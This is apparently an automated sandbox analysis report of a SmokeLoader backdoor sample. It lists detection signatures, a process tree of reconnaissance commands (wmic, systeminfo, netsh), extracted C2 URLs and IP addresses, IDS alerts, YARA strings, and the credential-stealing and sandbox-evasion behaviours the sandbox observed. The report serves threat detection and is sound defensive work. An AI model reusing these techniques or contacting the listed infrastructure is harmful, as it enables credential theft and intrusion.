Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
veEGy9FijY.exe

Overview

General Information

Sample name:veEGy9FijY.exe
renamed because original name is a hash value
Original sample name:43da422957b397e2805362661ab3fd4a.exe
Analysis ID:1524903
MD5:43da422957b397e2805362661ab3fd4a
SHA1:d9fcee0d2a68c509bd8fc8c30ee263de5c80b883
SHA256:e798106229f6985b40bd436abaf516360b7d19501f0f8c1ce89a3197ebb421a4
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • veEGy9FijY.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\veEGy9FijY.exe" MD5: 43DA422957B397E2805362661AB3FD4A)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 38E5.exe (PID: 4996 cmdline: C:\Users\user\AppData\Local\Temp\38E5.exe MD5: B39D75B20F14D8DFCB2325D7082CB2B9)
      • BC8F.exe (PID: 2032 cmdline: C:\Users\user\AppData\Local\Temp\BC8F.exe MD5: 69C7186C5393D5E94294E39DA1D4D830)
        • cmd.exe (PID: 3960 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 4040 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6348 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 4456 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2664 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2908 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6276 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6436 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6632 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6796 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6980 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2000 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6592 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6024 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 4996 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • ipconfig.exe (PID: 5764 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • ROUTE.EXE (PID: 1344 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
          • netsh.exe (PID: 1628 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • systeminfo.exe (PID: 7128 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • tasklist.exe (PID: 5248 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • explorer.exe (PID: 6072 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 4116 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 6112 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 412 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 1340 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 1784 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • haevsid (PID: 5064 cmdline: C:\Users\user\AppData\Roaming\haevsid MD5: 43DA422957B397E2805362661AB3FD4A)
  • uievsid (PID: 5332 cmdline: C:\Users\user\AppData\Roaming\uievsid MD5: B39D75B20F14D8DFCB2325D7082CB2B9)
  • msiexec.exe (PID: 5084 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • uievsid (PID: 4084 cmdline: C:\Users\user\AppData\Roaming\uievsid MD5: B39D75B20F14D8DFCB2325D7082CB2B9)
  • haevsid (PID: 4548 cmdline: C:\Users\user\AppData\Roaming\haevsid MD5: 43DA422957B397E2805362661AB3FD4A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["https://calvinandhalls.com/search.php", "https://bestworldhools.com/search.php"]}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000021.00000002.4141842433.00000000005D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Click to see the 34 entries
      SourceRuleDescriptionAuthorStrings
      9.3.uievsid.630000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        7.2.38E5.exe.610e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          33.3.uievsid.630000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            7.2.38E5.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              33.2.uievsid.5d0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 4 entries

                System Summary

                barindex
                Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 6592, StartAddress: 213032B0, TargetImage: C:\Users\user\Desktop\veEGy9FijY.exe, TargetProcessId: 6592
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\haevsid, CommandLine: C:\Users\user\AppData\Roaming\haevsid, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\haevsid, NewProcessName: C:\Users\user\AppData\Roaming\haevsid, OriginalFileName: C:\Users\user\AppData\Roaming\haevsid, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\haevsid, ProcessId: 5064, ProcessName: haevsid
                Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 2000, ProcessName: WMIC.exe
                Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 1344, ProcessName: ROUTE.EXE
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T12:27:27.327428+020020391031A Network Trojan was detected192.168.2.44973658.151.148.9080TCP
                2024-10-03T12:27:30.073115+020020391031A Network Trojan was detected192.168.2.44973758.151.148.9080TCP
                2024-10-03T12:27:32.842482+020020391031A Network Trojan was detected192.168.2.44973858.151.148.9080TCP
                2024-10-03T12:27:34.344677+020020391031A Network Trojan was detected192.168.2.44973958.151.148.9080TCP
                2024-10-03T12:27:37.885580+020020391031A Network Trojan was detected192.168.2.44974058.151.148.9080TCP
                2024-10-03T12:27:39.642687+020020391031A Network Trojan was detected192.168.2.44974158.151.148.9080TCP
                2024-10-03T12:27:41.164522+020020391031A Network Trojan was detected192.168.2.44974258.151.148.9080TCP
                2024-10-03T12:27:42.739696+020020391031A Network Trojan was detected192.168.2.44974358.151.148.9080TCP
                2024-10-03T12:27:44.297714+020020391031A Network Trojan was detected192.168.2.44974458.151.148.9080TCP
                2024-10-03T12:27:45.900693+020020391031A Network Trojan was detected192.168.2.44974558.151.148.9080TCP
                2024-10-03T12:27:47.407549+020020391031A Network Trojan was detected192.168.2.44974658.151.148.9080TCP
                2024-10-03T12:27:49.220848+020020391031A Network Trojan was detected192.168.2.44974758.151.148.9080TCP
                2024-10-03T12:27:51.564100+020020391031A Network Trojan was detected192.168.2.44974858.151.148.9080TCP
                2024-10-03T12:27:54.543734+020020391031A Network Trojan was detected192.168.2.44974958.151.148.9080TCP
                2024-10-03T12:27:56.427760+020020391031A Network Trojan was detected192.168.2.44975058.151.148.9080TCP
                2024-10-03T12:27:58.371820+020020391031A Network Trojan was detected192.168.2.44975258.151.148.9080TCP
                2024-10-03T12:28:00.315752+020020391031A Network Trojan was detected192.168.2.44975358.151.148.9080TCP
                2024-10-03T12:28:02.012344+020020391031A Network Trojan was detected192.168.2.44975458.151.148.9080TCP
                2024-10-03T12:28:04.228656+020020391031A Network Trojan was detected192.168.2.44975558.151.148.9080TCP
                2024-10-03T12:28:05.963555+020020391031A Network Trojan was detected192.168.2.44975658.151.148.9080TCP
                2024-10-03T12:28:08.026781+020020391031A Network Trojan was detected192.168.2.44975758.151.148.9080TCP
                2024-10-03T12:28:09.875717+020020391031A Network Trojan was detected192.168.2.44975858.151.148.9080TCP
                2024-10-03T12:28:12.117152+020020391031A Network Trojan was detected192.168.2.44975958.151.148.9080TCP
                2024-10-03T12:28:14.089980+020020391031A Network Trojan was detected192.168.2.44976058.151.148.9080TCP
                2024-10-03T12:28:15.643400+020020391031A Network Trojan was detected192.168.2.44976158.151.148.9080TCP
                2024-10-03T12:28:18.517348+020020391031A Network Trojan was detected192.168.2.44976358.151.148.9080TCP
                2024-10-03T12:28:20.067001+020020391031A Network Trojan was detected192.168.2.44976458.151.148.9080TCP
                2024-10-03T12:28:21.567293+020020391031A Network Trojan was detected192.168.2.44976558.151.148.9080TCP
                2024-10-03T12:28:42.497186+020020391031A Network Trojan was detected192.168.2.44976623.145.40.162443TCP
                2024-10-03T12:28:43.811450+020020391031A Network Trojan was detected192.168.2.44976723.145.40.162443TCP
                2024-10-03T12:28:44.692225+020020391031A Network Trojan was detected192.168.2.44976823.145.40.162443TCP
                2024-10-03T12:28:45.771345+020020391031A Network Trojan was detected192.168.2.44976923.145.40.162443TCP
                2024-10-03T12:28:46.645029+020020391031A Network Trojan was detected192.168.2.44977023.145.40.162443TCP
                2024-10-03T12:28:47.822862+020020391031A Network Trojan was detected192.168.2.44977123.145.40.162443TCP
                2024-10-03T12:28:48.682002+020020391031A Network Trojan was detected192.168.2.44977223.145.40.162443TCP
                2024-10-03T12:28:49.560507+020020391031A Network Trojan was detected192.168.2.44977323.145.40.162443TCP
                2024-10-03T12:28:51.285309+020020391031A Network Trojan was detected192.168.2.44977423.145.40.162443TCP
                2024-10-03T12:28:52.192256+020020391031A Network Trojan was detected192.168.2.44977523.145.40.162443TCP
                2024-10-03T12:28:53.101813+020020391031A Network Trojan was detected192.168.2.44977623.145.40.162443TCP
                2024-10-03T12:28:53.978056+020020391031A Network Trojan was detected192.168.2.44977723.145.40.162443TCP
                2024-10-03T12:28:54.876440+020020391031A Network Trojan was detected192.168.2.44977823.145.40.162443TCP
                2024-10-03T12:28:55.812885+020020391031A Network Trojan was detected192.168.2.44977923.145.40.162443TCP
                2024-10-03T12:28:56.986884+020020391031A Network Trojan was detected192.168.2.44978023.145.40.162443TCP
                2024-10-03T12:28:57.965948+020020391031A Network Trojan was detected192.168.2.44978123.145.40.162443TCP
                2024-10-03T12:28:58.988741+020020391031A Network Trojan was detected192.168.2.44978223.145.40.162443TCP
                2024-10-03T12:29:03.334662+020020391031A Network Trojan was detected192.168.2.44978323.145.40.162443TCP
                2024-10-03T12:29:31.304807+020020391031A Network Trojan was detected192.168.2.44978458.151.148.9080TCP
                2024-10-03T12:29:38.126601+020020391031A Network Trojan was detected192.168.2.44978558.151.148.9080TCP
                2024-10-03T12:29:46.811497+020020391031A Network Trojan was detected192.168.2.44978658.151.148.9080TCP
                2024-10-03T12:29:58.318141+020020391031A Network Trojan was detected192.168.2.44978758.151.148.9080TCP
                2024-10-03T12:30:12.095185+020020391031A Network Trojan was detected192.168.2.449788109.175.29.3980TCP
                2024-10-03T12:30:14.936616+020020391031A Network Trojan was detected192.168.2.44978923.145.40.162443TCP
                2024-10-03T12:30:20.786073+020020391031A Network Trojan was detected192.168.2.449790109.175.29.3980TCP
                2024-10-03T12:30:31.979046+020020391031A Network Trojan was detected192.168.2.44979123.145.40.162443TCP
                2024-10-03T12:30:38.459805+020020391031A Network Trojan was detected192.168.2.449792109.175.29.3980TCP
                2024-10-03T12:30:49.578093+020020391031A Network Trojan was detected192.168.2.44979323.145.40.162443TCP
                2024-10-03T12:30:55.626266+020020391031A Network Trojan was detected192.168.2.449794109.175.29.3980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T12:28:42.784254+020028098821Malware Command and Control Activity Detected192.168.2.44976623.145.40.162443TCP
                2024-10-03T12:28:44.091899+020028098821Malware Command and Control Activity Detected192.168.2.44976723.145.40.162443TCP
                2024-10-03T12:28:44.969641+020028098821Malware Command and Control Activity Detected192.168.2.44976823.145.40.162443TCP
                2024-10-03T12:28:46.042054+020028098821Malware Command and Control Activity Detected192.168.2.44976923.145.40.162443TCP
                2024-10-03T12:28:47.014851+020028098821Malware Command and Control Activity Detected192.168.2.44977023.145.40.162443TCP
                2024-10-03T12:28:48.074813+020028098821Malware Command and Control Activity Detected192.168.2.44977123.145.40.162443TCP
                2024-10-03T12:28:48.955500+020028098821Malware Command and Control Activity Detected192.168.2.44977223.145.40.162443TCP
                2024-10-03T12:28:50.644486+020028098821Malware Command and Control Activity Detected192.168.2.44977323.145.40.162443TCP
                2024-10-03T12:28:51.566750+020028098821Malware Command and Control Activity Detected192.168.2.44977423.145.40.162443TCP
                2024-10-03T12:28:52.468961+020028098821Malware Command and Control Activity Detected192.168.2.44977523.145.40.162443TCP
                2024-10-03T12:28:53.374778+020028098821Malware Command and Control Activity Detected192.168.2.44977623.145.40.162443TCP
                2024-10-03T12:28:54.252203+020028098821Malware Command and Control Activity Detected192.168.2.44977723.145.40.162443TCP
                2024-10-03T12:28:55.156826+020028098821Malware Command and Control Activity Detected192.168.2.44977823.145.40.162443TCP
                2024-10-03T12:28:56.094767+020028098821Malware Command and Control Activity Detected192.168.2.44977923.145.40.162443TCP
                2024-10-03T12:28:57.278366+020028098821Malware Command and Control Activity Detected192.168.2.44978023.145.40.162443TCP
                2024-10-03T12:28:58.240357+020028098821Malware Command and Control Activity Detected192.168.2.44978123.145.40.162443TCP
                2024-10-03T12:28:59.309408+020028098821Malware Command and Control Activity Detected192.168.2.44978223.145.40.162443TCP
                2024-10-03T12:30:15.179534+020028098821Malware Command and Control Activity Detected192.168.2.44978923.145.40.162443TCP
                2024-10-03T12:30:32.301417+020028098821Malware Command and Control Activity Detected192.168.2.44979123.145.40.162443TCP
                2024-10-03T12:30:49.938730+020028098821Malware Command and Control Activity Detected192.168.2.44979323.145.40.162443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T12:28:42.921889+020028298482Potentially Bad Traffic23.145.40.162443192.168.2.449766TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: veEGy9FijY.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\haevsidAvira: detection malicious, Label: HEUR/AGEN.1310247
                Source: C:\Users\user\AppData\Roaming\uievsidAvira: detection malicious, Label: HEUR/AGEN.1311799
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeAvira: detection malicious, Label: HEUR/AGEN.1311799
                Source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://calvinandhalls.com/search.php", "https://bestworldhools.com/search.php"]}
                Source: calvinandhalls.comVirustotal: Detection: 5%Perma Link
                Source: nwgrus.ruVirustotal: Detection: 12%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeReversingLabs: Detection: 36%
                Source: C:\Users\user\AppData\Roaming\haevsidReversingLabs: Detection: 34%
                Source: veEGy9FijY.exeReversingLabs: Detection: 34%
                Source: veEGy9FijY.exeVirustotal: Detection: 37%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\haevsidJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\uievsidJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeJoe Sandbox ML: detected
                Source: veEGy9FijY.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB43220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,10_2_00007FF6AAB43220
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB436F0 CryptExportKey,CryptExportKey,10_2_00007FF6AAB436F0
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E03098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,13_2_00E03098
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E03717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,13_2_00E03717
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E03E04 RtlCompareMemory,CryptUnprotectData,13_2_00E03E04
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E011E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,13_2_00E011E1
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E01198 CryptBinaryToStringA,CryptBinaryToStringA,13_2_00E01198
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E0123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,13_2_00E0123B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E01FCE CryptUnprotectData,RtlMoveMemory,13_2_00E01FCE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00B4263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,15_2_00B4263E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00B4245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,15_2_00B4245E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00B42404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,15_2_00B42404
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00A325A4 CryptBinaryToStringA,CryptBinaryToStringA,17_2_00A325A4
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00A32799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,17_2_00A32799
                Source: veEGy9FijY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\veEGy9FijY.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49768 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49769 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49770 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49771 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49773 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49776 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49778 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49779 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49781 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49782 version: TLS 1.2
